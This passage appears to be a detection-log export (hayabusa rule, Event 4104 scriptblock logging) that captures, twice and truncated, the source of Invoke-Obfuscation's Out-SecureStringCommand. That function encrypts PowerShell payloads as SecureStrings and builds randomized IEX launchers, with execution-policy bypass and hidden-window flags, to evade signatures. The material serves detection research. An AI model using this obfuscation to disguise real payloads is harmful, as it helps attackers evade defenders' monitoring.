License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-SecureStringCommand { <# .SYNOPSIS Generates AES-encrypted SecureString object out of three possible syntaxes for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-SecureStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-SecureStringCommand encrypts an input PowerShell scriptblock or path as a SecureString object. It randomly selects between three different syntaxes for accomplishing this. The purpose is to highlight to the Blue Team that there are more novel ways to encode/encrypt a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfi -NonIn "" IEX( ([Runtime.InteropServices.Marshal]::PtrToStringUni( [Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode( $('76492d1116743f0423413b16050a5345MgB8AG0AOQBKAEcAZgBHAEwAaQBBADkAbABoAFQASgBGAGEATgBBAFUAOABIAGcAPQA9AHwAYwBmADEAZgA4ADQAYgAyADkAZgBjADcAOABiAGYAYgBkADAAZAA5AGMAMgBlADgAZQBjADIAOAAxADYAOQBhADYANQBkADYANQA3ADEAMAAwADQAMwBjADgAMAA1AGMAZAAwADYAOQAxAGIAMQA5ADYAYwAwADQAMAA1AGEAOAA5ADEANwA1ADgANgA5ADEANABhAGQAMABhAGEANwAxAGUAZgBjADcAZABiADMAYgBlADgAYQBhAGIAMAAyADIANwA2AGYAYwBhAGQANwA0ADkAOAA2ADEAMAA0ADIAYQBkAGYAMAA5ADgAMwAzAGEAYwBmADYANQA5ADAANQA0ADcAYgAwADEANAAyADgAMwBmADUAMQAzADAAMQBmADAAZABkAGIAOQAxAGIAZQAxADIAZQA2ADIAMgAxADgAOAA5ADEANgA1AGEANgA2AGEAZABjADcAZQAwAGIANgBmADEANgA2ADAAMwBjADEANQAzAGUAZgBkADUAYQAwADYAMgBmAGMAOAAxAGUANgBmADgAYwA5ADUAZgBlADMANAA1ADQANQA3ADIANgA2ADYAOQBlAGUANwBkAGUAYQAyAGIAZAA2AGUAZgBiADUANwA4AGQANQA5ADIANgBjADMAZgBlADUANQA4AGMAOQBjADcANQA2ADEAYwA3ADQAYwAzAGUAZAA4ADkAOABlAGYANAA5AGUAZQAwADYAMgAxAGEAZgA2ADIAOABkAGYANwA4AGIAOAA1ADQANgA2ADIAYgBkAGQANAA4AGYANwA4AGYAYQBmAGIAZAAyAGMAYgBiADkANQBlADIAYwAyADYANABkADgAMgA2AGIAZQBlADIAZQBlAGUAOQA0AGIANgAxADIAZgA0ADIAOQBmADAAYwBmADIAOQBmAGYANgBlAGUAZAA3ADMAMAA0ADMAYwBjADQAMgBhAGIAZgA4ADAAMQA1ADYAOQA5AGYAZQA4AGIAMwBhAGMAOQAyADcAYwA2AGQAMgBmAGYANwA4AGQAOABiADAAZQBmADcANgBlAGIAMwBiADgAMwAxADcAZQBlAGQAYQBmAGYAYgBmAGIAYQA5AGEAYQBhAGQAOAA5AGQAZgAwAGMAMgAwAGUANQBlADcAOQA5ADAAZgBkADkAZAAwADMAYQBhADIAZAA0ADcAOQBkADAANgA1ADUAOAA=' |ConvertTo-SecureString -Key 241,131,91,52,14,165,71,51,19,86,1,104,87,220,235,62) ))) )"" C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru (New-Object Management.Automation.PSCredential ' ', ( '76492d1116743f0423413b16050a5345MgB8AEUAcQBKAHkAegBqAHUAQwBNAC8AeABPAHUAbgBlADAAUABMAHQARQAyAGcAPQA9AHwAMgBlAGEANQBiADMAMAA0ADMANQBkAGIAMQA2AGUAYwA2ADIANwAyADEANAA5ADUAYwAyADkAOAAzADUAZAAwADcANAAwADQAOQA0AGQAZQAwADUAYwBjADUAZgAwADYAYgA0AGIAYQA0AGYANwAxADUAMwA1AGUANQAxAGMANwBiADAANgA3ADgAOABmAGQAYwBjADYAMAA4AGYAZQAyADEAZAAyADQAMgBkAGYAYwBmADkAZQA5ADkAMwBmAGMAZAAzADgAOQAwADEANQBhADcANAA5AGUANQBiAGMAOAA2ADYAOAAxAGYAMwAxAGYAMwA4AGQANAA0ADAAYgA3ADUAMwBkADcAMQAwADAANABlAGIAOQAxAGIAOQAxADcAZgBjAGEANAA4ADUAOQBlADUAOAA1AGEANwBjADUAYQAwADgAOAAyAGEAMAAzADQAMQA3ADYAMwA0AGUAMwBiADUAZgA3AGMAMwA5AGQAZQAyADkAMgAxADAAMgA5ADUAMwBmADMAOAA5ADQAYwAyAGUANwA5AGMAMgA5ADEAMAAwAGEAMgAyAGQANQA4ADAAZQBiAGMAZAA1ADkAMgBlAGQAOAAyADIAZAA3ADQAYQBmADIANwAwADQAMQAzADQANgAxADQAMwA5ADgANQBlADIANQA2ADEAMwBiAGUAMwBhAGMAMQAwADIAYQBjAGMAYgA5AGUAYQBjAGQAZQAyADYAYgAyADkAZABjAGEAMAA4ADIANAA1AGMAOAAzADgAZgAyAGEAMABlAGYANAAwAGEAMgAyADgANQBlADkAMgAyAGEANgA0ADQANwBlADAAYgA0ADkAMgBkAGMANgAwAGMANwA3ADUAZABhADkAMgA1ADAAYgA0ADgAYQBmAGIAMQBjADEAMgA2ADEAZgA0ADkANgA4AGYAMQA0ADkAMAA0AGYANwBjAGMAYQBiAGQAZQA4ADIAMAA1AGUAZgA4ADMAZQAwAGMAYQBlADQAMgBkAGIAOQBkADUANwAzADQANwAyAGIAYwAxADQAYwBiAGEAZAA2AGYAZQAzADUAYgAxADgAYgBhADcANQAyADkAMAAwADcAMAA0ADQANgBlAGMAYQA1ADQAMQBhAGYAYgAzADYANwBjAGIAZgAyAGEAYgBkADgAZAAwAGEAZgBmADYAMQA2AGIAMAA1AGIANQA=' |ConvertTo-SecureString -Key 205,39,9,9,104,139,104,94,252,20,93,132,29,171,56,2 )).GetNetworkCredential().Password | Invoke-Expression .NOTES The size limit for a single SecureString object input is 65,536 characters. However, this will consume significant resources on the target system when decoding a SecureString object of this size (50% CPU and ~30 seconds on several test VMs). For larger payloads I would recommend chunking your payload and encoding/encrypting each piece separately and then reassembling each decoded/decrypted piece during runtime. I have a POC that does this and will be releasing a STAGING set of functions soon to accomplish this very task. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to a SecureString object. $SecureString = ConvertTo-SecureString $ScriptString -AsPlainText -Force # Randomly select the key length. Supported key lengths for SecureString (AES) are 16, 24 and 32. $KeyLength = Get-Random @(16,24,32) # Randomly select the key value and how it will be formatted. Switch(Get-Random -Minimum 1 -Maximum 3) { 1 { # Generate random key of length $KeyLength. $SecureStringKey = @() For($i=0; $i -lt $KeyLength; $i++) { $SecureStringKey += Get-Random -Minimum 0 -Maximum 256 } $SecureStringKeyStr = $SecureStringKey -Join ',' } 2 { # Generate sequential key of length $KeyLength with random array bounds. # To save space use shorthand array notation in final command with $SecureStringKeyStr. $LowerBound = (Get-Random -Minimum 0 -Maximum (256-$KeyLength)) $UpperBound = $LowerBound + ($KeyLength - 1) Switch(Get-Random @('Ascending','Descending')) { 'Ascending' {$SecureStringKey = ($LowerBound..$UpperBound); $SecureStringKeyStr = ""($LowerBound..$UpperBound)""} 'Descending' {$SecureStringKey = ($UpperBound..$LowerBound); $SecureStringKeyStr = ""($UpperBound..$LowerBound)""} default {Write-Error ""An invalid array ordering option was generated for switch block.""; Exit;} } } default {Write-Error ""An invalid random number was generated for switch block.""; Exit;} } # Convert SecureString object to text that we can load on target system. $SecureStringText = $SecureString | ConvertFrom-SecureString -Key $SecureStringKey # Generate random syntax for -Key command argument. $Key = (Get-Random -Input @(' -Key ',' -Ke ',' -K ')) # Randomly choose member invocation syntax. "".Invoke"" syntax below is not necessary for PS 3.0+ $PtrToStringAuto = (Get-Random -Input @('PtrToStringAuto',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(3,5)) + '].Name).Invoke'))) $PtrToStringUni = (Get-Random -Input @('PtrToStringUni' ,('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(2,4)) + '].Name).Invoke'))) $PtrToStringAnsi = (Get-Random -Input @('PtrToStringAnsi',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(0,1)) + '].Name).Invoke'))) # Below four notations are commented out as they only work on PS 3.0+ #$PtrToStringBSTR = (Get-Random -Input @('PtrToStringBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[142].Name).Invoke')) #$SecureStringToBSTR = (Get-Random -Input @('SecureStringToBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[162].Name)')) #$SecureStringToGlobalAllocUnicode = (Get-Random -Input @('SecureStringToGlobalAllocUnicode','([Runtime.InteropServices.Marshal].GetMembers()[169].Name)')) #$SecureStringToGlobalAllocAnsi = (Get-Random -Input @('SecureStringToGlobalAllocAnsi' ,'([Runtime.InteropServices.Marshal].GetMembers()[168].Name)')) # Randomize the case versions for necessary operations. $PtrToStringAuto = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAuto("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringUni = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringUni("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringAnsi = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAnsi("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::PtrToStringBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocUnicode = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocAnsi = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocAnsi(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $NewObject = ([Char[]]'New-Object ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PSCredential = ([Char[]]'Management.Automation.PSCredential ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ConvertToSecureString = ([Char[]]'ConvertTo-SecureString' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Key = ([Char[]]$Key | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $GetNetworkCredential = ([Char[]]').GetNetworkCredential().Password' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Set syntax for running ConvertTo-SecureString cmdlet. $ConvertToSecureStringSyntax = '$(' + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate the code that will decrypt and execute the payload and randomly select one. $NewScriptArray = @() $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAuto + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringUni + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocUnicode + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAnsi + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocAnsi + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringBSTR + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $NewObject + ' '*(Get-Random -Input @(0,1)) + $PSCredential + ' '*(Get-Random -Input @(0,1)) + ""' '"" + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + $GetNetworkCredential # Select random option from above. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out (and not sure that I ever will), these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Select random option from above. $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBou",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.271 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-SecureStringCommand { <# .SYNOPSIS Generates AES-encrypted SecureString object out of three possible syntaxes for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-SecureStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-SecureStringCommand encrypts an input PowerShell scriptblock or path as a SecureString object. It randomly selects between three different syntaxes for accomplishing this. The purpose is to highlight to the Blue Team that there are more novel ways to encode/encrypt a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfi -NonIn "" IEX( ([Runtime.InteropServices.Marshal]::PtrToStringUni( [Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode( $('76492d1116743f0423413b16050a5345MgB8AG0AOQBKAEcAZgBHAEwAaQBBADkAbABoAFQASgBGAGEATgBBAFUAOABIAGcAPQA9AHwAYwBmADEAZgA4ADQAYgAyADkAZgBjADcAOABiAGYAYgBkADAAZAA5AGMAMgBlADgAZQBjADIAOAAxADYAOQBhADYANQBkADYANQA3ADEAMAAwADQAMwBjADgAMAA1AGMAZAAwADYAOQAxAGIAMQA5ADYAYwAwADQAMAA1AGEAOAA5ADEANwA1ADgANgA5ADEANABhAGQAMABhAGEANwAxAGUAZgBjADcAZABiADMAYgBlADgAYQBhAGIAMAAyADIANwA2AGYAYwBhAGQANwA0ADkAOAA2ADEAMAA0ADIAYQBkAGYAMAA5ADgAMwAzAGEAYwBmADYANQA5ADAANQA0ADcAYgAwADEANAAyADgAMwBmADUAMQAzADAAMQBmADAAZABkAGIAOQAxAGIAZQAxADIAZQA2ADIAMgAxADgAOAA5ADEANgA1AGEANgA2AGEAZABjADcAZQAwAGIANgBmADEANgA2ADAAMwBjADEANQAzAGUAZgBkADUAYQAwADYAMgBmAGMAOAAxAGUANgBmADgAYwA5ADUAZgBlADMANAA1ADQANQA3ADIANgA2ADYAOQBlAGUANwBkAGUAYQAyAGIAZAA2AGUAZgBiADUANwA4AGQANQA5ADIANgBjADMAZgBlADUANQA4AGMAOQBjADcANQA2ADEAYwA3ADQAYwAzAGUAZAA4ADkAOABlAGYANAA5AGUAZQAwADYAMgAxAGEAZgA2ADIAOABkAGYANwA4AGIAOAA1ADQANgA2ADIAYgBkAGQANAA4AGYANwA4AGYAYQBmAGIAZAAyAGMAYgBiADkANQBlADIAYwAyADYANABkADgAMgA2AGIAZQBlADIAZQBlAGUAOQA0AGIANgAxADIAZgA0ADIAOQBmADAAYwBmADIAOQBmAGYANgBlAGUAZAA3ADMAMAA0ADMAYwBjADQAMgBhAGIAZgA4ADAAMQA1ADYAOQA5AGYAZQA4AGIAMwBhAGMAOQAyADcAYwA2AGQAMgBmAGYANwA4AGQAOABiADAAZQBmADcANgBlAGIAMwBiADgAMwAxADcAZQBlAGQAYQBmAGYAYgBmAGIAYQA5AGEAYQBhAGQAOAA5AGQAZgAwAGMAMgAwAGUANQBlADcAOQA5ADAAZgBkADkAZAAwADMAYQBhADIAZAA0ADcAOQBkADAANgA1ADUAOAA=' |ConvertTo-SecureString -Key 241,131,91,52,14,165,71,51,19,86,1,104,87,220,235,62) ))) )"" C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru (New-Object Management.Automation.PSCredential ' ', ( '76492d1116743f0423413b16050a5345MgB8AEUAcQBKAHkAegBqAHUAQwBNAC8AeABPAHUAbgBlADAAUABMAHQARQAyAGcAPQA9AHwAMgBlAGEANQBiADMAMAA0ADMANQBkAGIAMQA2AGUAYwA2ADIANwAyADEANAA5ADUAYwAyADkAOAAzADUAZAAwADcANAAwADQAOQA0AGQAZQAwADUAYwBjADUAZgAwADYAYgA0AGIAYQA0AGYANwAxADUAMwA1AGUANQAxAGMANwBiADAANgA3ADgAOABmAGQAYwBjADYAMAA4AGYAZQAyADEAZAAyADQAMgBkAGYAYwBmADkAZQA5ADkAMwBmAGMAZAAzADgAOQAwADEANQBhADcANAA5AGUANQBiAGMAOAA2ADYAOAAxAGYAMwAxAGYAMwA4AGQANAA0ADAAYgA3ADUAMwBkADcAMQAwADAANABlAGIAOQAxAGIAOQAxADcAZgBjAGEANAA4ADUAOQBlADUAOAA1AGEANwBjADUAYQAwADgAOAAyAGEAMAAzADQAMQA3ADYAMwA0AGUAMwBiADUAZgA3AGMAMwA5AGQAZQAyADkAMgAxADAAMgA5ADUAMwBmADMAOAA5ADQAYwAyAGUANwA5AGMAMgA5ADEAMAAwAGEAMgAyAGQANQA4ADAAZQBiAGMAZAA1ADkAMgBlAGQAOAAyADIAZAA3ADQAYQBmADIANwAwADQAMQAzADQANgAxADQAMwA5ADgANQBlADIANQA2ADEAMwBiAGUAMwBhAGMAMQAwADIAYQBjAGMAYgA5AGUAYQBjAGQAZQAyADYAYgAyADkAZABjAGEAMAA4ADIANAA1AGMAOAAzADgAZgAyAGEAMABlAGYANAAwAGEAMgAyADgANQBlADkAMgAyAGEANgA0ADQANwBlADAAYgA0ADkAMgBkAGMANgAwAGMANwA3ADUAZABhADkAMgA1ADAAYgA0ADgAYQBmAGIAMQBjADEAMgA2ADEAZgA0ADkANgA4AGYAMQA0ADkAMAA0AGYANwBjAGMAYQBiAGQAZQA4ADIAMAA1AGUAZgA4ADMAZQAwAGMAYQBlADQAMgBkAGIAOQBkADUANwAzADQANwAyAGIAYwAxADQAYwBiAGEAZAA2AGYAZQAzADUAYgAxADgAYgBhADcANQAyADkAMAAwADcAMAA0ADQANgBlAGMAYQA1ADQAMQBhAGYAYgAzADYANwBjAGIAZgAyAGEAYgBkADgAZAAwAGEAZgBmADYAMQA2AGIAMAA1AGIANQA=' |ConvertTo-SecureString -Key 205,39,9,9,104,139,104,94,252,20,93,132,29,171,56,2 )).GetNetworkCredential().Password | Invoke-Expression .NOTES The size limit for a single SecureString object input is 65,536 characters. However, this will consume significant resources on the target system when decoding a SecureString object of this size (50% CPU and ~30 seconds on several test VMs). For larger payloads I would recommend chunking your payload and encoding/encrypting each piece separately and then reassembling each decoded/decrypted piece during runtime. I have a POC that does this and will be releasing a STAGING set of functions soon to accomplish this very task. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to a SecureString object. $SecureString = ConvertTo-SecureString $ScriptString -AsPlainText -Force # Randomly select the key length. Supported key lengths for SecureString (AES) are 16, 24 and 32. $KeyLength = Get-Random @(16,24,32) # Randomly select the key value and how it will be formatted. Switch(Get-Random -Minimum 1 -Maximum 3) { 1 { # Generate random key of length $KeyLength. $SecureStringKey = @() For($i=0; $i -lt $KeyLength; $i++) { $SecureStringKey += Get-Random -Minimum 0 -Maximum 256 } $SecureStringKeyStr = $SecureStringKey -Join ',' } 2 { # Generate sequential key of length $KeyLength with random array bounds. # To save space use shorthand array notation in final command with $SecureStringKeyStr. $LowerBound = (Get-Random -Minimum 0 -Maximum (256-$KeyLength)) $UpperBound = $LowerBound + ($KeyLength - 1) Switch(Get-Random @('Ascending','Descending')) { 'Ascending' {$SecureStringKey = ($LowerBound..$UpperBound); $SecureStringKeyStr = ""($LowerBound..$UpperBound)""} 'Descending' {$SecureStringKey = ($UpperBound..$LowerBound); $SecureStringKeyStr = ""($UpperBound..$LowerBound)""} default {Write-Error ""An invalid array ordering option was generated for switch block.""; Exit;} } } default {Write-Error ""An invalid random number was generated for switch block.""; Exit;} } # Convert SecureString object to text that we can load on target system. $SecureStringText = $SecureString | ConvertFrom-SecureString -Key $SecureStringKey # Generate random syntax for -Key command argument. $Key = (Get-Random -Input @(' -Key ',' -Ke ',' -K ')) # Randomly choose member invocation syntax. "".Invoke"" syntax below is not necessary for PS 3.0+ $PtrToStringAuto = (Get-Random -Input @('PtrToStringAuto',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(3,5)) + '].Name).Invoke'))) $PtrToStringUni = (Get-Random -Input @('PtrToStringUni' ,('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(2,4)) + '].Name).Invoke'))) $PtrToStringAnsi = (Get-Random -Input 